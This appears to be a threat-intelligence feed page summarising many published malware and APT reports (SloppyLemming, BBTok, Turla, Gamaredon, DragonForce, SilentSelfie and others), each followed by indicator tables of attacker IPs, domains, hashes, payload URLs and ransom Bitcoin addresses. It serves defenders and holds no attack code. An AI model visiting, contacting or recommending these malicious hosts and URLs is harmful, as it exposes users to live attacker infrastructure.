Xyber Xecurity

Unraveling SloppyLemming’s Operations Across South Asia

An investigation reveals SloppyLemming, an advanced threat actor targeting South and East Asian countries, particularly Pakistan. The group uses multiple cloud services for credential harvesting, malware delivery, and command and control. Their operations focus on government, law enforcement, energy, telecommunications, and technology entities in Pakistan, Bangladesh, Sri Lanka, and China. SloppyLemming employs phishing tactics, exploits vulnerabilities, and utilizes various malware tools. The actor's lack of operational security has provided insights into their tooling and infrastructure. Cloudflare has taken steps to disrupt the actor's operations and collaborated with industry partners to mitigate the threat.

Type	Indicator
IPv4	139.59.109.136
IPv4	142.93.139.164
IPv4	149.28.153.250
IPv4	185.249.198.218
IPv4	45.137.116.8
IPv4	47.245.126.218
IPv4	47.254.229.56
CVE	CVE-2023-38831
FileHash-MD5	659ab8cb034e557fce0c3ecd631f3590
FileHash-MD5	e2a32e7d772a9a4eeccee9c71ec3a6d4
FileHash-MD5	fa40357daaa8ed8e73eeef25f0f478ac
FileHash-SHA1	9b45b35d577680022e20d20dc7052463398ccf36
FileHash-SHA1	b53de85852479ea2a772bd3407b9e4d38eb1e1e7
FileHash-SHA1	bc490c61ce87efc0faf93dd4160219ef303e3e1d
FileHash-SHA256	06f82a8d80ec911498e3493ebefa8ad45e102dd887ce2edc11f8f51bafab2e80
FileHash-SHA256	3dfb8d198de95090e2ad3ffc9d9846af5c3074563acb0ce5b0ef62b20e4bf432
FileHash-SHA256	82e99ceea9e6d31555b0f2bf637318fd97e5609e3d4d1341aec39db2e26cf211
FileHash-SHA256	95cf90b2610c6f0ec67c1d669cd252468f6c3b8eaeea588f342d2bd74d90e093
FileHash-SHA256	a3c9b56a0ce787d7aa7787d9ff0e806a6fb0b216327591b1e1113391c609fd17
FileHash-SHA256	ac3dff91982709f575cfbc6954b61130b4eeab5d3759772db220f1b76836be4d
FileHash-SHA256	b6ae5b714f18ca40a111498d0991e1e30cd95317b4904d2ef0d49937f0552000
FileHash-SHA256	e3bc0246ab95b527aa86e52e62f554ab8db04523f35aee50b508d0fa48ab49f7
FileHash-SHA256	fb4397c837c7e401712764f953723153d5bb462bc944518959288ea47dec6446
IPv4	159.253.120.25
IPv4	159.65.6.251
IPv4	207.148.73.145
IPv4	208.85.22.252
IPv4	37.27.41.167
IPv4	47.236.65.190
IPv4	47.237.105.113
IPv4	47.237.20.135
IPv4	47.237.20.201
IPv4	47.237.25.198
IPv4	47.245.114.11
IPv4	47.245.2.77
IPv4	47.245.42.208
IPv4	47.245.56.29
IPv4	47.74.84.168
IPv4	47.74.87.155
IPv4	47.76.181.76
IPv4	47.76.61.241
IPv4	47.83.23.246
IPv4	8.219.114.124
IPv4	8.219.169.226
IPv4	8.222.235.145
domain	cflayerprotection.com
domain	cloudlflares.com
domain	crec-bd.site
domain	email.click
domain	hit-pk.org
domain	humariweb.info
domain	itsupport-gov.com
domain	jammycanonicalupdates.cloud
domain	link.click
domain	modp-pk.org
domain	mofapak.info
domain	opensecurity-legacy.com
domain	paknavy-pk.org
domain	quran-books.store
domain	updpcn.online
hostname	accounts.opensecurity-legacy.com
hostname	acrobat.paknavy-pk.org
hostname	api.opensecurity-legacy.com
hostname	bin.opensecurity-legacy.com
hostname	blabla.apl-com.icu
hostname	browser.apl-org.online
hostname	cloud.adobefileshare.com
hostname	cloud.cflayerprotection.com
hostname	confidential.zapto.org
hostname	data.cloudlflares.com
hostname	dawn.apl-org.online
hostname	docs.apl-com.icu
hostname	fonts.apl-org.online
hostname	frontend-m.opensecurity-legacy.com
hostname	hesco.hascolgov.info
hostname	hurr.zapto.org
hostname	locaal.navybd-gov.info
hostname	localhost.apl-com.icu
hostname	locall.hascolgov.info
hostname	login.apl-org.online
hostname	m.opensecurity-legacy.com
hostname	mail.apl-com.icu
hostname	mail.pakistangov.com
hostname	mailpitb-securedocs.zapto.org
hostname	monitor.opensecurity-legacy.com
hostname	oil.hascolgov.info
hostname	openkm.paknavy-pk.org
hostname	owa-spamcheck.apl-org.online
hostname	pitb.zapto.org
hostname	redzone.apl-org.online
hostname	redzone2.apl-org.online
hostname	sco.zapto.org
hostname	secure.cflayerprotection.com
hostname	secure.cloudlflares.com
hostname	sensors.opensecurity-legacy.com
hostname	static.opensecurity-legacy.com
hostname	update.apl-org.online
hostname	www.168-gov.info
hostname	www.cloudlflares.com
hostname	www.crec-bd.site
hostname	zero-berlin-covenant.apl-org.online

BBTok Targeting Brazil: Deobfuscating the .NET Loader with dnlib and PowerShell

This analysis dissects the infection chain of BBTok, a Brazilian-targeted threat. The malware utilizes an ISO image containing a shortcut file and various components. It employs the Microsoft Build Engine to compile and execute malicious C# code on the victim's machine. The core component, Trammy.dll, is obfuscated using ConfuserEx and utilizes AppDomain Manager Injection for execution. The malware creates a log file, gathers system information, and establishes persistence through scheduled tasks and service creation. It downloads additional components, including CCProxy for traffic manipulation, and a Delphi payload. The attack specifically targets Brazilian IP addresses and employs evasion techniques to avoid detection.

Type	Indicator
FileHash-MD5	3aeefe5867b49d1d323502e2b86d40e1
FileHash-MD5	4d7d4d92dc7d86b72abf81821ff83837
FileHash-MD5	950e785d417105c2a8dae00571ef7923
FileHash-MD5	c479d696d08fc9414920deae7983ca8e
FileHash-SHA1	704efd1447be699762781a4b67e4c1ae1f7c9789
FileHash-SHA1	9672cade96c657a8860d60923afdbe4c46a2935d
FileHash-SHA1	970cdb16e5fc52be85e311f6c28dbb75086f1cf3
FileHash-SHA1	cc9f6c4f482d5fce70ed907d781db2d409e15bc3
FileHash-SHA256	09027fa9653bdf2b4a291071f7e8a72f14d1ba5d0912ed188708f9edd6a084fe
FileHash-SHA256	24fac4ef193014e34fc30f7a4b7ccc0b1232ab02f164f105888aabe06efbacc3
FileHash-SHA256	276a1e9f62e21c675fdad9c7bf0a489560cbd959ac617839aeb9a0bc3cd41366
FileHash-SHA256	27914c36fd422528d8370cbbc0e45af1ba2c3aeedca1579d92968649b3f562f7
FileHash-SHA256	2d2c2ba0f0d155233cdcbf41a9cf166a6ce9b80a6ab4395821ce658afe04aaba
FileHash-SHA256	2ff420e3d01893868a50162df57e8463d1746d3965b76025ed88db9bb13388af
FileHash-SHA256	35db2b34412ad7a1644a8ee82925a88369bc58f6effc11d8ec6d5f81650d897e
FileHash-SHA256	5e5a58bfabd96f0c78c1e12fa2625aba9c84aa3bd4c9bb99d079d6ccb6e46650
FileHash-SHA256	7559c440245aeeca28e67b7f13d198ba8add343e8d48df92b7116a337c98b763
FileHash-SHA256	7566131ce0ecba1710c1a7552491120751b58d6d55f867e61a886b8e5606afc3
FileHash-SHA256	8e7f0a51d7593cf76576b767ab03ed331d822c09f6812015550dbd6843853ce7
FileHash-SHA256	a3afed0dabefde9bb8f8f905ab24fc2f554aa77e3a94b05ed35cffc20c201e15
FileHash-SHA256	ac044dd9ae8f18d928cf39d24525e2474930faf8e83c6e3ad52496ecab11f510
FileHash-SHA256	b60eb62f6c24d4a495a0dab95cc49624ac5099a2cc21f8bd010a410401ab8cc3
FileHash-SHA256	cb1d2659508a4f50060997ee0e60604598cb38bd2bb90962c6a51d8b798a03b6
FileHash-SHA256	dc03070d50fdd31c89491d139adfb211daf171d03e9e6d88aac43e7ff44e4fef
FileHash-SHA256	ddf84fdc080bd55f6f2b409e596b6f7a040c4ab1eb4b965b3f709a0f7faa4e02
domain	fileondemandd.site
hostname	contador.danfajuda.com

Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy

Unit 42 researchers have uncovered two new malware samples used by the North Korean threat group Sparkling Pisces (aka Kimsuky). These include an undocumented keylogger called KLogEXE and a variant of a backdoor named FPSpy. The analysis reveals the group's evolving capabilities and extensive arsenal. Both malware samples share code similarities and utilize sophisticated techniques for data exfiltration and command execution. The research highlights Sparkling Pisces' continuous evolution, expanding infrastructure, and targeting of South Korean and Japanese entities. The discovery enhances understanding of the group's tactics and provides insights for better defense against such threats.

Type	Indicator
FileHash-SHA256	2e768cee1c89ad5fc89be9df5061110d2a4953b336309014e0593eb65c75e715
FileHash-SHA256	990b7eec4e0d9a22ec0b5c82df535cf1666d9021f2e417b49dc5110a67228e27
FileHash-SHA256	a173a425d17b6f2362eca3c8ea4de9860b52faba414bbb22162895641dda0dc2
FileHash-SHA256	c69cd6a9a09405ae5a60acba2f9770c722afde952bd5a227a72393501b4f5343
FileHash-SHA256	faf666019333f4515f241c1d3fcfc25c67532463245e358b90f9e498fe4f6801
IPv4	152.32.138.167
hostname	mail.apollo-page.r-e.kr
hostname	nidlogin.apollo.r-e.kr

Analyzing the Newest Turla Backdoor

The Russian APT group Turla has launched a new campaign using shortcut files to infect systems with a fileless backdoor. The malware employs evasion techniques such as disabling ETW and AMSI, and unhooking. The attack begins with a shortcut file mimicking a PDF, which creates a file executed using MSBuild. The final payload is a fileless backdoor obfuscated with SmartAssembly. The backdoor implements custom commands for file creation and PowerShell script execution. It communicates with the C2 server using encrypted and encoded data. The analysis reveals sophisticated techniques to avoid detection, including DLL mapping to bypass hooks and patching of ETW and AMSI-related functions.

Type	Indicator
FileHash-MD5	005c762a3c39b1114c6521f52acb66c3
FileHash-MD5	371ef30b422378d95f64804391f24818
FileHash-MD5	a88597f35bf778f4a0c21d7f231c9091
FileHash-SHA1	19d576e1a7c0c7e6dae6dce79743db5f2defa79f
FileHash-SHA1	47791e973dc71e23de8635d801509149d9d74288
FileHash-SHA1	bcbdff86daeb92215081dffc8660900816159721
FileHash-SHA256	7091ce97fb5906680c1b09558bafdf9681a81f5f524677b90fd0f7fc0a05bc00
FileHash-SHA256	8d6fe8e336e020410753ff15ece5f36bae992f7f234385a23590a11ed734792d
FileHash-SHA256	b6abbeab6e000036c6cdffc57c096d796397263e280ea264eba73ac5bab39441
FileHash-SHA256	cac4d4364d20fa343bf681f6544b31995a57d8f69ee606c4675db60be5ae8775
hostname	files.philbendeck.com

Cyberespionage the Gamaredon way: Analysis of toolset used to spy on Ukraine in 2022 and 2023

This report provides a comprehensive analysis of the toolset used by the Russia-aligned Gamaredon APT group to conduct cyberespionage activities against Ukraine in 2022 and 2023. The group has been active since 2013 and is currently the most prolific threat actor targeting Ukrainian governmental institutions. Gamaredon employs a variety of custom malware tools written in PowerShell, VBScript, and C, as well as some open-source tools. The analysis covers their tactics for initial access, including spearphishing and weaponized documents and USB drives. It details numerous tools used for downloading payloads, dropping files, weaponizing systems, stealing data, and maintaining backdoor access. The report also examines Gamaredon's obfuscation techniques, network infrastructure, and methods for bypassing domain-based blocking.

Type	Indicator
IPv4	5.181.156.109
IPv4	161.35.106.28
IPv4	185.163.47.177
IPv4	185.225.19.16
FileHash-SHA1	025e3d88c53fc12d5a4aab726e696f2815bac84d
FileHash-SHA1	04f1ed3050d6b2527d6196dff5845b10510d0c2f
FileHash-SHA1	0fa9303ed739a3c6a76cef4517b9adb60c73ca80
FileHash-SHA1	0fd02b12517221f71a4a3774630c05643ee59988
FileHash-SHA1	13ba279d8602fee7cede152b6a9148cd9d2f6662
FileHash-SHA1	16fd6cba3f13cc5b195cd6c0dd33bbf08cd0fe39
FileHash-SHA1	1aeae7a567c71200ba804801c4cec227d2b64414
FileHash-SHA1	224b18e531e511cea2849d9a3b9cf5ad502afecc
FileHash-SHA1	2416dfc031cf0d05054d5beb9739cba6470fe585
FileHash-SHA1	28f4f0367c2bb0574c8a7d1b9c3e71e6ac678300
FileHash-SHA1	2b9b0ad0b65bb6101704684cd339e946fae2dcfa
FileHash-SHA1	2cdb1da4df1a33e379c2f24dd6a05709f4848cb6
FileHash-SHA1	44c720ae508f448263a83cac26775d6709dfbbdd
FileHash-SHA1	47a03ebb9798a8df7ec8212134d418e937b449e9
FileHash-SHA1	49cf239ab2ebd04cafdcec07fbb0c1c1a43e8c02
FileHash-SHA1	4f915541291120aa100123c1c93fa7de78f46a3f
FileHash-SHA1	565a4cd6e4f74e17a37d34e6ef93ab6ded71b3aa
FileHash-SHA1	5720ffdf9d9cd649445cbc12844e2b587622643a
FileHash-SHA1	5befc01a3771e61151224e18f926226ff7fd4a40
FileHash-SHA1	6d694b73a2c497f16eb9b5cca883658397ffbedf
FileHash-SHA1	742e34ba21650ecb0b7ef33f786641f0be823be8
FileHash-SHA1	7793282401b134077e70217b55b0c4b45850d119
FileHash-SHA1	801a9b08987977692223b7105dec8b21b9d9749e
FileHash-SHA1	82123c17117ef235f3b57d0c5572c861e3ed7173
FileHash-SHA1	821362a484908e93f8ba748b600665ae6444303d
FileHash-SHA1	8a2261d8c8111d2d99276575120b9ea65d0aeaea
FileHash-SHA1	9a6b36e6cad9156ea6e09de740d3f1ccb6816f87
FileHash-SHA1	9b6ef236d9dc758336f1d89268822f8611c8b973
FileHash-SHA1	9e30dffdb88dd3adfab4cd5c67a98336c4bf9504
FileHash-SHA1	a3c21f9a493a05f9428e8f5fe5af7f0c2bf67f95
FileHash-SHA1	a93503bbb613f084add338b9fa2eee466bf3a2d6
FileHash-SHA1	ac17fd08a3987cc91dfd6649ba3dabe8a9671305
FileHash-SHA1	b08305c557692619b9d0eaf5b58a8b91858cf4d5
FileHash-SHA1	b2b58cef19546b2d2284b2eb5f22b6d8fdb94d4e
FileHash-SHA1	b50f10bbdb49be6d868b09f3e1dd6c78d58d8e89
FileHash-SHA1	b99d4724077b0a2cbeee38332c05f3d4171c9dcc
FileHash-SHA1	ba2366ed4e83ffc6dec489c9011fe181ce169a47
FileHash-SHA1	ba5f7e2fa9be1cb3fc7ae113f41c36e4f2c464b6
FileHash-SHA1	cb9712bed15723973171192da17946bf6778d98d
FileHash-SHA1	d5576e578518e474a5dff654c44ab3ec4a6e4ecf
FileHash-SHA1	d58bfb39969f28698f90bf2e8782057e2f83c2df
FileHash-SHA1	df1c0a70e7a02b839ab3aac3fc410e61eefb58eb
FileHash-SHA1	e0bd8855159cb708789c4de183e107c5c117fba1
FileHash-SHA1	e2feee0b92819ac7fca85cfe3dc37750834f0990
FileHash-SHA1	e537deaf3a77c5c0f0b9f8a12ff5995dd24cd259
FileHash-SHA1	f05874c1b908fdef4b9af2b084e3d813595a12c9
FileHash-SHA1	fea57a486eb4bdac5e7d59c9958c42293a5abe12
IPv4	141.98.233.17
IPv4	143.198.160.45
IPv4	159.223.152.63
IPv4	164.92.115.188
IPv4	165.227.208.207
IPv4	167.172.139.39
IPv4	185.163.45.5
IPv4	188.166.247.34
IPv4	194.180.191.30
IPv4	195.133.88.128
IPv4	209.97.165.187
IPv4	212.18.104.56
IPv4	46.29.234.46
IPv4	5.252.178.140
IPv4	62.133.62.73
IPv4	67.205.160.237
IPv4	68.183.2.92
IPv4	80.90.181.107
IPv4	89.185.84.141
IPv4	89.185.84.204
IPv4	89.19.209.154
IPv4	89.23.107.188
IPv4	91.200.148.232
domain	absorbeni.ru
domain	amasiyagi.ru
domain	consentesto.ru
domain	dfgqdsd.ru
domain	fritopa.ru
domain	goloser.ru
domain	hakold.ru
domain	havxcq.ru
domain	hulortad.ru
domain	lokalut.ru
domain	loturam.ru
domain	marginisbi.ru
domain	nikortal.ru
domain	nododru.ru
domain	opela.ru
domain	retarus.ru
domain	rieturc.ru
domain	statuesque.ru
domain	tolofa.ru
domain	using.ru
domain	youdad.ru
hostname	login.kifales.ru
hostname	www.toorisugita.ru

MimiStick — imitators of Sticky Werewolf

F.A.C.C.T. Threat Intelligence discovered a malicious file targeting Russian defense industry enterprises. Initially thought to be the work of Sticky Werewolf, further analysis revealed a new threat actor named MimiStick. The attack used a PDF lure mimicking a letter from the Russian Ministry of Labor. The malware employed a multi-stage infection chain, ultimately deploying a Sliver implant. Later findings confirmed the campaign was indeed Sticky Werewolf, who had expanded their toolkit to include Sliver implant alongside their existing Quasar RAT. The group registered multiple domains, including one impersonating the Ministry of Labor, likely for future phishing campaigns.

Type	Indicator
FileHash-MD5	0756de02dd3b4be840d31c8871148f7f
FileHash-MD5	5ed144351c41eb690d86c523690eb265
FileHash-MD5	67aa63c4518a3604e37f89ad0d39a34d
FileHash-MD5	725e5068bd68c3d055f3a814f402a8be
FileHash-MD5	7e151444c98ef2cf084eed8e6d4be807
FileHash-MD5	873454911a81a6c892838c44cbb3059b
FileHash-SHA1	2849ad434d55b8f2bc067c37903b5ff5bad01dbd
FileHash-SHA1	3100e869b1052dee920f7f2ca35da60abdf5aac0
FileHash-SHA1	3fba74f0f7f91f665ad68db9004f1fec3486595b
FileHash-SHA1	c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d
FileHash-SHA1	e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0
FileHash-SHA1	efd81a26fd43124d435bc0223c5f42839f793d42
FileHash-SHA256	3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90
FileHash-SHA256	5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71
FileHash-SHA256	65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f
FileHash-SHA256	8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78
FileHash-SHA256	b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321
FileHash-SHA256	ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff
IPv4	213.183.54.123
domain	about-tech.ru
domain	borosan.ru
domain	min-trud-gov.ru
domain	mysafer.ru
domain	orkprank.ru
domain	rtxcore.ru
domain	techitzone.ru

Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations

This advisory outlines the activities of an Iran-based cyber threat group that has conducted numerous intrusions against organizations in the United States and other countries since 2017, with the goal of obtaining network access to facilitate ransomware attacks. The group, known by various names such as Pioneer Kitten and UNC757, exploits vulnerabilities in public-facing devices to gain initial access, and then uses techniques like credential theft, remote access tools, and webshells to maintain persistence and move laterally within compromised networks. A significant portion of their operations involves collaborating with ransomware affiliates like NoEscape and ALPHV to deploy ransomware and extort victims. The advisory provides details on the group's tactics, techniques, procedures, indicators of compromise, and recommended mitigations.

Type	Indicator
BitcoinAddress	bc1q2egjjzmchtm3q3h3een37zsvpph86hwgq4xskh
BitcoinAddress	bc1q6620fmev7cvkfu82z43vwjtec6mzgcp5hjrdne
BitcoinAddress	bc1q6w2an66vrje747scecrgzucw9ksha66x9zt980
BitcoinAddress	bc1q8n7jjgdepuym825zwwftr3qpem3tnjx3m50ku0
BitcoinAddress	bc1qjzw7sh3pd5msgehdaurzv04pm40hm9ajpwjqky
BitcoinAddress	bc1ql837eewad47zn0uzzjfgqjhsnf2yhkyxvxyjjc
BitcoinAddress	bc1qlwd94gf5uhdpu4gynk6znc5j3rwk9s53c0dhjs
BitcoinAddress	bc1qn5tla384qxpl6zt7kd068hvl7y4a6rt684ufqp
BitcoinAddress	bc1qr6h2zcxlntpcjystxdf7qy2755p25yrwucm4lq
BitcoinAddress	bc1qsn4l6h3mhyhmr72vw4ajxf2gr74hwpalks2tp9
BitcoinAddress	bc1qtjhvqkun4uxtr4qmq6s3f7j49nr4sp0wywp489
BitcoinAddress	bc1qx9tteqhama2x2w9vwqsyny6hldh8my8udx5jlm
BitcoinAddress	bc1qy8pnttrfmyu4l3qcy59gmllzqq66gmr446ppcr
BitcoinAddress	bc1qz75atxj4dvgezyuspw8yz9khtkuk5jpdgfauq8
FileHash-SHA256	0a6f992e1372db4f245595424a7436ebb610775d6addc4d568acc2af5d315221
FileHash-SHA256	14f8ad7d1553d1a47cf4c9e7bedabcc5b759c86e54c636175a472c11d7dec70f
FileHash-SHA256	185ada4556737a4f26ae16f1a99ca82ab5684c32719ee426c420c0bc14384a0a
FileHash-SHA256	2c76104c9aaaf32453a814c227e7d9d755451b551a3fd30d2ea332df396b3a31
FileHash-SHA256	3488458145eb62d7d3947e3811234f4663d9b5aeef6584ab08a2099a7f946664
FileHash-SHA256	b761680e23f2ebb5f6887d315ebd05b2d7c365731e093b49adb059c3dccaa30c
FileHash-SHA256	ea2ec0c3859d8d8c36d95a298beef6d7add17856655bfbea2554b8714f7c7c69
domain	githubapp.net
hostname	api.gupdate.net
hostname	cloud.sophos.one
hostname	login.forticloud.online

Inside the Dragon: DragonForce Ransomware Group

In this blog, Group-IB delves into the inner workings of the DragonForce ransomware group. Discovered in August 2023, DragonForce has been targeting companies in critical sectors using a variant of a leaked LockBit3.0 builder, and more recently in July 2024 with their own variant of ransomware. DragonForce operates a Ransomware-as-a-Service (RaaS) affiliate program utilizing a variant of LockBit3.0, and the other, though initially claimed as original, is based on ContiV3. The group employs double extortion tactics, encrypting data, and threatening leaks unless a ransom is paid.

Type	Indicator
IPv4	185.73.125.8
IPv4	94.232.46.202
IPv4	69.4.234.20
IPv4	2.147.68.96
IPv4	185.59.221.75
FileHash-MD5	97b70e89b5313612a9e7a339ee82ab67
FileHash-MD5	a50637f5f7a3e462135c0ae7c7af0d91
FileHash-MD5	bb7c575e798ff5243b5014777253635d
FileHash-MD5	c111476f7b394776b515249ecb6b20e6

Infrastructure linking PandorahVNC and Mesh Central

This analysis investigates PandorahVNC, a sophisticated Hidden Virtual Network Computing tool, and its connections to a new service called AnonVNC. The report explores the online presence of the tool's creator, known as 'All_father', and examines the infrastructure used for both PandorahVNC and AnonVNC. It reveals links between these services and MeshCentral, a legitimate remote session manager. The investigation uncovers potential new developments in the creator's toolkit, including the use of MeshCentral's Mesh Agent. The report also discusses various threat actors who have leveraged PandorahVNC for malicious purposes, ranging from state-sponsored groups to cybercriminals.

Type	Indicator
IPv4	62.112.11.136
FileHash-MD5	c7c699eb8695a564fe0b400b1bf138ba
FileHash-SHA1	52e3be4428c5c2b42d64ba9bcc584472391157c5
IPv4	141.95.6.166
IPv4	51.254.27.112
IPv4	66.94.109.162
IPv4	94.131.121.91
domain	anonvnc.com
domain	hiddenvnc.com
domain	hvncs.com
domain	pandorahvnc.shop
domain	validatax.com
domain	vncapk.io

LummaC2: Obfuscation Through Indirect Control Flow

This analysis examines a control flow obfuscation technique used by recent LummaC2 stealer samples. The malware employs customized control flow indirection to manipulate execution, hindering reverse engineering and automated analysis. The obfuscation transforms functions into 'dispatcher blocks' that use encoded offsets and indirect jumps to obscure the original control flow. Three main dispatcher types are identified: register-based, memory-based, and mixed-order. The analysis also covers conditional dispatcher logic for loops and syscalls. To deobfuscate, the researchers developed an automated method using symbolic backward slicing to differentiate dispatcher instructions from original code and recover the true control flow. This allows rebuilding deobfuscated functions for analysis.

Type	Indicator
FileHash-MD5	205e45e123aea66d444feaba9a846748
FileHash-MD5	5099026603c86efbcf943449cd6df54a
FileHash-MD5	d01e27462252c573f66a14bb03c09dd2

Sophisticated Malware Campaign Targets Czech Officials Using NATO-Themed Decoys

Seqrite Labs APT-Team discovered a sophisticated malware campaign targeting government and military officials in the Czech Republic. The campaign leveraged NATO-themed decoy documents to lure victims and employed a multistage attack chain involving a malicious batch script, a Rust-based loader, and the Havoc post-exploitation framework. The campaign utilized advanced techniques like ETW patching, process injection, and encrypted payloads to evade detection and establish persistence on compromised systems. The threat actor behind the operation appears to have Russian origins and used open-source offensive tools extensively.

Type	Indicator
FileHash-MD5	00a78177ed7a711c8cdddcb73d4f9784
FileHash-MD5	6eb2eb8f723163932b51ffb5274f5304
FileHash-MD5	a077b9179728e25aad4334f89bd5dd36
FileHash-MD5	a08edbfab6084c1861f8e7aecaf8c25d
FileHash-MD5	a8d7e56eb01a8cf576533db9af2e92ec
FileHash-MD5	b31b8310a136a0ba4e90b368a351f53f
FileHash-MD5	de31247081978512be6a8ca58b4752a4
FileHash-SHA1	192f767c2d27966f50109fb62ff645fe38cc8d97
FileHash-SHA1	20ed156d55454bf084004b39115073d0b2551355
FileHash-SHA1	3593d39611d8e1ecb190ec76cedab4c1e214be72
FileHash-SHA1	6c1bdbc71f93642f0b5b9dfc85ae1501510f5e12
FileHash-SHA1	8d2e67d031ce8d3c7f65dcdf7dfcdd28dea19bd9
FileHash-SHA1	a960549eb634dbc781dc617f9000d3d29aa8711a
FileHash-SHA1	ab26bff6f61dfe1fef20656e364c4492ba1ab335
FileHash-SHA256	1dbcade04333b9dc81ba0746bc604d12489da49b9b65fcb5b1f61d139dc5949c
FileHash-SHA256	38da8d1576bdd0a03e649e8e6543594b35a423aa5b0a0c4081fc477c8e487e09
FileHash-SHA256	436994d4a5c8d54acb2b521d0847d77e6af6c2c0e40468248b1dd019c6dafa84
FileHash-SHA256	6e0d12cd0252599fd1dec7aa460cae7a12a1b2e322b6664e64c773c23627d1b4
FileHash-SHA256	8820e0c249305ffa3d38e72a7f27c0e2195bc739d08f5d270884be6237eea500
FileHash-SHA256	9549d3d2b8e8b4e8f163a8b9fa3b02b8a28d78e4b583baccb6210ef267559c6e
FileHash-SHA256	a05d053174b52a9b158a5ec841c1a7633b9368c4ac2da371a11a9364f8a8dc60
FileHash-SHA256	ace33243994a9da0797601bdd4191e25967a1da2644f0d0b530e26c71854d5d9
FileHash-SHA256	b29ed89e0428ba476459adabb5630c8d29f7fee5905c5de10d792fe3a02e52a6
FileHash-SHA256	ed6775184051ef36c3049e24167471ab42bd4301e99631c8423d4d753cdad455
FileHash-SHA256	fda71a7de6d473826465bb83210107501e66a5d96e533772444b3b24806286fd
URL	https://206.188.197.113/

WalletConnect Scam: A Case Study in Crypto Drainer Tactics

An investigation uncovered a malicious app on Google Play targeting mobile users to steal cryptocurrency. The app, posing as a legitimate WalletConnect tool, used advanced evasion techniques to avoid detection for nearly five months. It achieved over 10,000 downloads through fake reviews and branding. The attackers used social engineering and a modern crypto drainer toolkit, stealing approximately $70,000 from over 150 victims. The malware, identified as MS Drainer, supports multiple blockchains and employs sophisticated methods to drain user wallets. This case highlights the growing sophistication of cybercriminal tactics in decentralized finance, emphasizing the need for vigilance among users and improved security measures in app stores.

Type	Indicator
FileHash-SHA256	42330ccaaacea8a18794c7e9fad100de31ea415bff7821e407b9ac70ef690032
FileHash-SHA256	bf557e975733c113acc38daa18ca1849a1022b4c30b118899f68210cd3c7f990
FileHash-SHA256	ea526792150e71402f896ddaf1f04aedcb1356aea3bfebbcaf6c90bcdde7aa0c
domain	cakeserver.online
domain	mestoxcalculator.com
domain	web3protocol.online

HZ Rat backdoor for macOS harvests data from WeChat and DingTalk

A version of the HZ Rat backdoor targeting users of China’s WeChat and DingTalk was uploaded to VirusTotal in July 2023 and was not detected by any vendor, research by Kaspersky suggests.

Type	Indicator
FileHash-MD5	0c3201d0743c63075b18023bb8071e73
FileHash-MD5	287ccbf005667b263e0e8a1ccfb8daec
FileHash-MD5	6cc838049ece4fcb36386b7a3032171f
FileHash-MD5	6d478c7f94d95981eb4b6508844050a6
FileHash-MD5	7005c9c6e2502992017f1ffc8ef8a9b9
FileHash-MD5	7355e0790c111a59af377babedee9018
FileHash-MD5	7a66cd84e2d007664a66679e86832202
FileHash-MD5	7ed3fc831922733d70fb08da7a244224
FileHash-MD5	8d33f667ca135a88f5bf77a0fab209d4
FileHash-MD5	9cdb61a758afd9a893add4cef5608914
FileHash-MD5	a5af0471e31e5b11fd4d3671501dfc32
FileHash-MD5	da07b0608195a2d5481ad6de3cc6f195
FileHash-MD5	dd71b279a0bf618bbe9bb5d934ce9caa

SilentSelfie: Revealing a major campaign against Kurdish websites

A large-scale cyber espionage campaign targeting Kurdish websites was uncovered, involving 25 compromised sites using four variants of malicious scripts. The attacks ranged from simple location tracking to prompting users to install malicious Android apps. Despite lacking sophisticated techniques, the campaign's scale and duration were notable, operating undetected since late 2022. The compromised sites were linked to Kurdish media, political organizations, and the Rojava administration in Syria. A malicious Android app disguised as a news app was also discovered, capable of exfiltrating user data. While attribution remains uncertain, potential actors include Turkish intelligence, Syrian government, or the Kurdistan Regional Government of Iraq.

Type	Indicator
FileHash-MD5	7ff9e87f8c8ea10e6aa688c491c81283
FileHash-SHA1	6c75d5f31fe386a1ec94b85cfb7f873b2e100062
FileHash-SHA256	2d75110d4c227c59b9c8fb02cc54b99d0b41e33a2fe1ad50e2fdf0cfb1e701d5
IPv4	170.75.161.102
IPv4	23.95.14.63
IPv4	24.246.223.228
URL	http://170.75.161.102/asd.js
URL	http://rojnews.news/wp-includes/sitemaps/
URL	http://ronahi.video/wo_cookie.php
URL	http://ronahi.video/wo_cookies.php
URL	http://webmail.onlinearuba.net/7b2[redacted]600a/logs.php
URL	https://rojnews.news/ku/wp-content/mobile.html
URL	https://targetplatform.net/mobile.html
domain	ciwanensoresger.com
domain	dicle.fm
domain	dirbesiye.fm
domain	halkin-dg.com
domain	hbdh.info
domain	init4afrin.org
domain	kongra-star.org
domain	leftkup.com
domain	lekolin.org
domain	nuceciwan129.xyz
domain	orkesfm.com
domain	pajk.org
domain	ronahi.net
domain	ronahi.video
domain	sdf-press.com
domain	sehidenrojava.com
domain	star-fm.net
domain	targetplatform.net
domain	tev-dem.com
domain	thkp-c.org
domain	ypj-office.com
domain	ypjrojava.net
domain	yra-ufm.com
domain	zindi24.com
hostname	webmail.onlinearuba.net
YARA	fd8e25d1e0865fc8a7fb33fa1797fa1a4f4ce88e
YARA	936ac199159f316087973a74e1fe9b155868ae83
YARA	02a8dd33b54ec801ad073001e2d384ee9da98dbb
YARA	d4f3cad0a5fb11f974b37c1d2b8b3a1db46205f5
YARA	23c7b8bd11b06151c643982dc7fb5a34278c46ec
YARA	e1e6e66c027890b03eccd00c4730f61fdb3d3c6d
YARA	21af2ccd18add5f947bbd0684012b63e58beb4a1

European Banks Already Under Attack by New Malware Variant

